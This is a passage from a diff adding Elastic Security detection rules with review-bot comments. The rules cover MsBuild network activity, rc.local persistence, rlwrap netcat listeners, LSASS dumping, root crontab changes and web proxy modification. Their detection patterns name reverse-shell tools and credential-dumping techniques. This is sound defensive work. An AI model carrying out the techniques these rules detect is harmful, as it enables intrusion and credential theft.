module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ 
+ { + "id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "0e52157a-8e96-4a95-a6e3-5faae5081a74_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_108.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_108.json new file mode 100644 index 00000000000..bd2449c10f3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_108.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies MsBuild.exe making outbound network connections. This may indicate adversarial activity as MsBuild is often leveraged by adversaries to execute code and evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "MsBuild Making Network Connections", + "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\") and\n not dns.question.name : \"localhost\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0e79980b-4250-4a50-a509-69294c14e84b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + 
"name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "0e79980b-4250-4a50-a509-69294c14e84b_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_110.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_110.json new file mode 100644 index 00000000000..5c7c628e0b0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_110.json 
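Review bot: The investigation guide in `note` states the rule looks for MsBuild execution "followed by a network connection to an external address", but the `query` only excludes loopback (`not cidrmatch(destination.ip, "127.0.0.1", "::1")` and `not dns.question.name : "localhost"`), so connections to private or internal addresses fire as well. Either the guide should say `followed by a network connection to any non-loopback address`, or the query should be narrowed if external-only is the intent; given the false-positive section already recommends destination-IP exceptions, correcting the wording looks like the cheaper fix.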
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors the creation/alteration of the rc.local file by a previously unknown process executable through the use of the new terms rule type. The /etc/rc.local file is used to start custom applications, services, scripts or commands during start-up. The rc.local file has mostly been replaced by Systemd. However, through the \"systemd-rc-local-generator\", rc.local files can be converted to services that run at boot. Adversaries may alter rc.local to execute malicious code at start-up, and gain persistence onto the system.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence Through Run Control Detected", + "new_terms_fields": [ + "host.id", + "process.executable", + "user.id" + ], + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution.\n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital.\n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. 
Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type : \"linux\" and event.category : \"file\" and\nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not process.name : (\n \"dockerd\" or \"docker\" or \"dnf\" or \"dnf-automatic\" or \"yum\" or \"rpm\" or \"dpkg\"\n) and not file.extension : (\"swp\" or \"swpx\")\n", + "references": [ + "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", + "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#8-boot-or-logon-initialization-scripts-rc-scripts", + "https://www.cyberciti.biz/faq/how-to-enable-rc-local-shell-script-on-systemd-while-booting-linux-system/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0f4d35e4-925e-4959-ab24-911be207ee6f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 110 + }, + "id": "0f4d35e4-925e-4959-ab24-911be207ee6f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_3.json b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_3.json new file mode 100644 index 00000000000..58e90a8de18 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_3.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the execution of a netcat listener via rlwrap. rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. This utility can be used in conjunction with netcat to gain a more stable reverse shell.", + "false_positives": [ + "Netcat is a dual-use tool that can be used for benign or malicious activity. Netcat is included in some Linux distributions so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Netcat Listener Established via rlwrap", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"rlwrap\" and process.args in (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\", \"socat\") and\nprocess.args : \"*l*\" and process.args_count >= 4\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0f56369f-eb3d-459c-a00b-87c2bf7bdfc5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "0f56369f-eb3d-459c-a00b-87c2bf7bdfc5_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_208.json b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_208.json new file mode 100644 index 00000000000..36f30708c2c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0f93cb9a-1931-48c2-8cd0-f173fd3e5283_208.json 
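Review bot: The `process.args : "*l*"` clause in `query` matches any argument containing the letter l, not only a listen switch, so an rlwrap-wrapped netcat invoked as a client with an argument such as `localhost` also satisfies the rule; if the listen flag is the intent, anchoring on a leading dash (for example `process.args : "-*l*"`) would narrow it while still covering combined flags like `-lvp`. This reading is inferred from the rule name and description, which speak of a listener, so the wider match may be a deliberate trade-off at risk score 21. Minor consistency point: the `setup` text here says "We suggest to select", while the sibling rules in this series use "We suggest selecting".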
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious access to an LSASS handle via PssCaptureSnapShot where two successive process accesses are performed by the same process and target two different instances of LSASS. This may indicate an attempt to evade detection and dump LSASS memory for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential LSASS Memory Dump via PssCaptureSnapShot", + "query": "event.category:process and host.os.type:windows and event.code:10 and\n winlog.event_data.TargetImage:(\"C:\\\\Windows\\\\system32\\\\lsass.exe\" or\n \"c:\\\\Windows\\\\system32\\\\lsass.exe\" or\n \"c:\\\\Windows\\\\System32\\\\lsass.exe\")\n", + "references": [ + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://twitter.com/sbousseaden/status/1280619931516747777?lang=en" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0f93cb9a-1931-48c2-8cd0-f173fd3e5283", + "setup": "## Setup\n\nThis is meant to run only on datasources using Elastic Agent 7.14+ since versions prior to that will be missing the threshold\nrule cardinality feature.\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": 
"https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "winlog.event_data.TargetProcessId", + "value": 2 + } + ], + "field": [ + "process.entity_id" + ], + "value": 2 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 208 + }, + "id": "0f93cb9a-1931-48c2-8cd0-f173fd3e5283_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_106.json b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_106.json new file mode 100644 index 00000000000..af3ea01d4d2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0ff84c42-873d-41a2-a4ed-08d74d352d01_106.json 
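Review bot: The `winlog.event_data.TargetImage` list in `query` enumerates three casing variants of the LSASS path but omits `C:\Windows\System32\lsass.exe` (uppercase drive letter together with `System32`), and because `required_fields` declares the field as `keyword`, matching is exact and case-sensitive unless the index applies a lowercase normalizer, so Sysmon events logged with that casing would not count toward the threshold. Adding the fourth variant to the list, or rewriting the clause as a wildcard on the path tail, would close the gap. The `threshold` block's cardinality of 2 on `winlog.event_data.TargetProcessId` grouped by `process.entity_id` does match the two-instance behavior the description calls out, so that part reads consistently.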
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the root crontab file. Adversaries may overwrite this file to gain code execution with root privileges by exploiting privileged file write or move related vulnerabilities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Privilege Escalation via Root Crontab File Modification", + "query": "event.category:file and host.os.type:macos and not event.type:deletion and\n file.path:/private/var/at/tabs/root and not process.executable:/usr/bin/crontab\n", + "references": [ + "https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc", + "https://www.exploit-db.com/exploits/42146" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0ff84c42-873d-41a2-a4ed-08d74d352d01", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "0ff84c42-873d-41a2-a4ed-08d74d352d01_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_106.json b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_106.json new file mode 100644 index 00000000000..3e3f667b91f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/10a500bb-a28f-418e-ba29-ca4c8d1a9f2f_106.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the built-in networksetup command to configure webproxy settings. This may indicate an attempt to hijack web browser traffic for credential access via traffic sniffing or redirection.", + "false_positives": [ + "Legitimate WebProxy Settings Modification" + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "WebProxy Settings Modification", + "query": "event.category:process and host.os.type:macos and event.type:start and\n process.name : networksetup and process.args : ((\"-setwebproxy\" or \"-setsecurewebproxy\" or \"-setautoproxyurl\") and not (Bluetooth or off)) and\n not process.parent.executable : (\"/Library/PrivilegedHelperTools/com.80pct.FreedomHelper\" or\n \"/Applications/Fiddler Everywhere.app/Contents/Resources/app/out/WebServer/Fiddler.WebUi\" or\n \"/usr/libexec/xpcproxy\")\n", + "references": [ + "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "https://objectivebythesea.com/v2/talks/OBTS_v2_Zohar.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + 